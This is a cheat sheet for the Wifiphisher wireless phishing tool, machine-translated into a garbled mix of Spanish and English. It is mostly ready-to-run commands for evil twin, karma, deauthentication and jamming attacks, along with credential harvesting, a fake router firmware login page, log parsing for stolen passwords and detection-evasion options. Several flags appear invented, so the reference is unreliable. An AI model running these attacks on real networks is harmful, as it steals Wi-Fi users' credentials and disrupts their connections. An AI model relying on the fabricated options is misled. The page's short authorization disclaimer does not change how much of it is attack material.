Saltar a contenido

Wifiphisher Wireless Phishing Framework Cheat Sheet

"Clase de la hoja" idbutton id="wifisher-copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos id="wifisher-pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button ■/div titulada

Sinopsis

Wifisher es un Rogue Access Point framework for conducting red team engagements or Wi-Fi security testing. Crea redes inalámbricas falsas para realizar ataques de phishing automatizados contra clientes inalámbricos, capturar credenciales y realizar ataques de hombre en medio.

NOVEDAD Advertencia: Esta herramienta está destinada a pruebas de penetración autorizadas y evaluaciones de seguridad inalámbrica solamente. Asegúrese de tener la autorización adecuada antes de usar en cualquier entorno.

Instalación

Kali Linux

# Install from repositories
sudo apt update
sudo apt install wifiphisher

# Install additional dependencies
sudo apt install hostapd dnsmasq

Ubuntu/Debian

# Install dependencies
sudo apt update
sudo apt install python3 python3-pip git hostapd dnsmasq

# Clone repository
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher

# Install Python dependencies
pip3 install -r requirements.txt

# Install Wifiphisher
sudo python3 setup.py install

Instalación manual

# Install required packages
sudo apt install python3-dev python3-setuptools libnl-3-dev libnl-genl-3-dev

# Clone and install
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python3 setup.py install

Docker Instalación

# Build Docker image
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
docker build -t wifiphisher .

# Run with network privileges
docker run --rm -it --net=host --privileged wifiphisher

Uso básico

Ataque simple del ataque del ataúd

# Basic attack with automatic target selection
sudo wifiphisher

# Attack specific network
sudo wifiphisher -t "Target_Network"

# Use specific interface
sudo wifiphisher -i wlan0

# Use custom template
sudo wifiphisher -p firmware-upgrade

Interface Management

# List available interfaces
sudo wifiphisher --list-interfaces

# Use specific interfaces
sudo wifiphisher -i wlan0 -jI wlan1

# Monitor mode setup
sudo airmon-ng start wlan0
sudo wifiphisher -i wlan0mon

Referencia del Comando

Opciones básicas

Option Description
-t, --target Target network ESSID
-i, --interface Wireless interface
-jI, --jam-interface Interface for jamming
-p, --phishing-scenario Phishing template
-pK, --presharedkey WPA/WPA2 pre-shared key
-qS, --quitonsuccess Quit on credential capture

Opciones avanzadas

Option Description
-aI, --apinterface AP interface
-nJ, --nojamming Disable jamming
-e, --essid Access Point ESSID
-dE, --deauth-essid Deauth specific ESSID
-dC, --deauth-channels Deauth channels
-nE, --noextensions Disable extensions

Opciones de registro

Option Description
-l, --logging Enable logging
-lP, --log-path Log file path
-cP, --credential-log-path Credential log path
-lC, --log-credentials Log captured credentials

Plantillas de Phishing

Plantillas disponibles

# List available templates
sudo wifiphisher --list-phishing-scenarios

# Common templates:
# - firmware-upgrade: Router firmware upgrade
# - oauth-login: OAuth login page
# - wifi-connect: WiFi connection page
# - browser-plugin-update: Browser plugin update
# - network-manager-connect: Network manager

Plantilla de actualización de firmware

# Use firmware upgrade scenario
sudo wifiphisher -p firmware-upgrade -t "Target_Network"

# This template:
# - Creates fake router admin page
# - Requests admin credentials
# - Simulates firmware upgrade process

Plantilla de inicio de sesión OAuth

# Use OAuth login scenario
sudo wifiphisher -p oauth-login -t "Target_Network"

# This template:
# - Creates fake OAuth login page
# - Captures social media credentials
# - Redirects to legitimate service

Creación de plantilla personalizada

# Template directory structure
/usr/share/wifiphisher/data/phishing-pages/custom-template/
├── config.ini
├── html/
│   ├── index.html
│   ├── style.css
│   └── script.js
└── static/
    └── images/

Configuración de plantilla (config.ini)

[info]
Name = Custom Template
Description = Custom phishing template
Language = en

[context]
# Template-specific settings
ESSID = \\\\{ESSID\\\\}
MAC = \\\\{MAC\\\\}
CHANNEL = \\\\{CHANNEL\\\\}

Ataques avanzados

Evil Twin Attack

# Create evil twin of target network
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade

# With specific MAC address
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade --mac 00:11:22:33:44:55

# With channel specification
sudo wifiphisher -t "Corporate_WiFi" -p firmware-upgrade -c 6

Portal de captura Ataque

# Create captive portal
sudo wifiphisher -e "Free_WiFi" -p wifi-connect

# Custom captive portal
sudo wifiphisher -e "Hotel_WiFi" -p oauth-login

# Corporate network simulation
sudo wifiphisher -e "Corporate_Guest" -p network-manager-connect

WPA/WPA2 Handshake Capture

# Capture handshakes while phishing
sudo wifiphisher -t "Target_Network" -p firmware-upgrade --handshake-capture

# Specify handshake output file
sudo wifiphisher -t "Target_Network" --handshake-capture -hC /tmp/handshakes/

Karma Attack

# Respond to all probe requests
sudo wifiphisher --karma

# Karma with specific template
sudo wifiphisher --karma -p oauth-login

# Karma with custom ESSID list
sudo wifiphisher --karma --essid-list /path/to/essid_list.txt

Jamming y Deauthentication

Deauthenticación dirigida

# Deauth specific network
sudo wifiphisher -dE "Target_Network"

# Deauth specific client
sudo wifiphisher -dC 00:11:22:33:44:55

# Deauth on specific channels
sudo wifiphisher --deauth-channels 1,6,11

Configuración de jamming

# Use separate interface for jamming
sudo wifiphisher -i wlan0 -jI wlan1

# Disable jamming
sudo wifiphisher -nJ

# Custom jamming parameters
sudo wifiphisher --jam-band 2.4GHz --jam-channels 1,6,11

Jamming inteligente

# Intelligent jamming based on target
sudo wifiphisher -t "Target_Network" --smart-jamming

# Adaptive jamming
sudo wifiphisher --adaptive-jamming --jam-threshold 5

Extensiones y complementos

Extensiones disponibles

# List available extensions
sudo wifiphisher --list-extensions

# Common extensions:
# - credentialharvester: Capture credentials
# - handshakecapture: Capture WPA handshakes
# - dnsmasqhandler: DNS spoofing
# - captiveportal: Captive portal functionality

Crédential Harvester

# Enable credential harvesting
sudo wifiphisher -p oauth-login --credentialharvester

# Custom credential log
sudo wifiphisher -p oauth-login --credentialharvester -cP /tmp/creds.log

Extensión de la captura de mano

# Enable handshake capture
sudo wifiphisher -t "Target_Network" --handshakecapture

# Specify capture directory
sudo wifiphisher -t "Target_Network" --handshakecapture -hC /tmp/handshakes/

DNS Spoofing Extension

# Enable DNS spoofing
sudo wifiphisher --dnsmasqhandler

# Custom DNS configuration
sudo wifiphisher --dnsmasqhandler --dns-conf /etc/dnsmasq.conf

Desarrollo de plantillas personalizadas

Estructura de la plantilla HTML


<!DOCTYPE html>
<html>
<head>
    <title>Router Configuration</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>
    <div class="container">
        <h1>Router Firmware Update</h1>
        <p>Network: \\\\{ESSID\\\\}</p>
        <form method="post" action="/login">
            <input type="text" name="username" placeholder="Admin Username" required>
            <input type="password" name="password" placeholder="Admin Password" required>
            <button type="submit">Update Firmware</button>
        </form>
    </div>
    <script src="script.js"></script>
</body>
</html>

CSS Styling

/* style.css */
body \\\\{
    font-family: Arial, sans-serif;
    background: #f0f0f0;
    margin: 0;
    padding: 50px;
\\\\}

.container \\\\{
    max-width: 400px;
    margin: auto;
    background: white;
    padding: 30px;
    border-radius: 5px;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
\\\\}

input \\\\{
    width: 100%;
    padding: 12px;
    margin: 10px 0;
    border: 1px solid #ddd;
    border-radius: 3px;
\\\\}

button \\\\{
    width: 100%;
    background: #007cba;
    color: white;
    padding: 12px;
    border: none;
    border-radius: 3px;
    cursor: pointer;
\\\\}

Función de JavaScript

// script.js
document.addEventListener('DOMContentLoaded', function() \\\\{
    // Add form validation
    const form = document.querySelector('form');
    form.addEventListener('submit', function(e) \\\\{
        const username = document.querySelector('input[name="username"]').value;
        const password = document.querySelector('input[name="password"]').value;

        if (!username||!password) \\\\{
            e.preventDefault();
            alert('Please enter both username and password');
        \\\\}
    \\\\});

    // Simulate loading
    setTimeout(function() \\\\{
        document.querySelector('.container').style.opacity = '1';
    \\\\}, 500);
\\\\});

Vigilancia y registro

Vigilancia en tiempo real

# Monitor in real-time
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l

# Monitor with verbose output
sudo wifiphisher -t "Target_Network" -p firmware-upgrade -l -v

# Monitor specific log file
tail -f /var/log/wifiphisher.log

Registros Credenciales

# Enable credential logging
sudo wifiphisher -p oauth-login -lC -cP /tmp/credentials.log

# Monitor captured credentials
tail -f /tmp/credentials.log

# Parse credential log
grep -o '"username":"[^"]*"' /tmp/credentials.log|cut -d'"' -f4

Análisis de tráfico

# Capture network traffic
sudo tcpdump -i wlan0 -w /tmp/wifiphisher_traffic.pcap

# Analyze with Wireshark
wireshark /tmp/wifiphisher_traffic.pcap

# Extract HTTP credentials
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

Técnicas de evacuación

Dirección de MAC Randomización

# Use random MAC address
sudo wifiphisher -t "Target_Network" --random-mac

# Use specific MAC address
sudo wifiphisher -t "Target_Network" --mac 00:11:22:33:44:55

# Clone target AP MAC
sudo wifiphisher -t "Target_Network" --clone-mac

Canalización

# Use channel hopping
sudo wifiphisher --channel-hop

# Specific channel sequence
sudo wifiphisher --channel-sequence 1,6,11,1,6,11

# Random channel selection
sudo wifiphisher --random-channel

Evasión de tiempo

# Delayed start
sudo wifiphisher -t "Target_Network" --delay 300

# Random intervals
sudo wifiphisher -t "Target_Network" --random-intervals

# Burst mode
sudo wifiphisher -t "Target_Network" --burst-mode

Solución de problemas

Cuestiones de interfaz

# Check interface status
iwconfig

# Reset interface
sudo ifconfig wlan0 down
sudo ifconfig wlan0 up

# Check for monitor mode support
sudo iw list|grep -A 10 "Supported interface modes"

# Kill conflicting processes
sudo airmon-ng check kill

Cuestiones de admisión

# Check permissions
ls -la /usr/bin/wifiphisher

# Fix permissions
sudo chmod +x /usr/bin/wifiphisher

# Check sudo configuration
sudo visudo

Cuestiones de dependencia

# Check Python dependencies
pip3 list|grep -E "(scapy|netfilterqueue|roguehostapd)"

# Reinstall dependencies
pip3 install --upgrade -r requirements.txt

# Check system packages
dpkg -l|grep -E "(hostapd|dnsmasq)"

Cuestiones de red

# Check network configuration
ip addr show

# Check routing table
ip route show

# Test internet connectivity
ping -c 4 8.8.8.8

# Check DNS resolution
nslookup google.com

Consideraciones jurídicas y éticas

Requisitos de autorización

# Always obtain written authorization
# Document scope and limitations
# Follow responsible disclosure
# Respect privacy and data protection laws

Buenas prácticas

# Use only for authorized testing
# Minimize impact on legitimate users
# Provide immediate feedback and education
# Secure captured data appropriately
# Follow industry standards and guidelines

Recursos

-...

*Esta hoja de trampa proporciona una referencia completa para el uso de Wifisher. Siempre asegúrese de tener una autorización adecuada antes de realizar evaluaciones de seguridad inalámbrica. *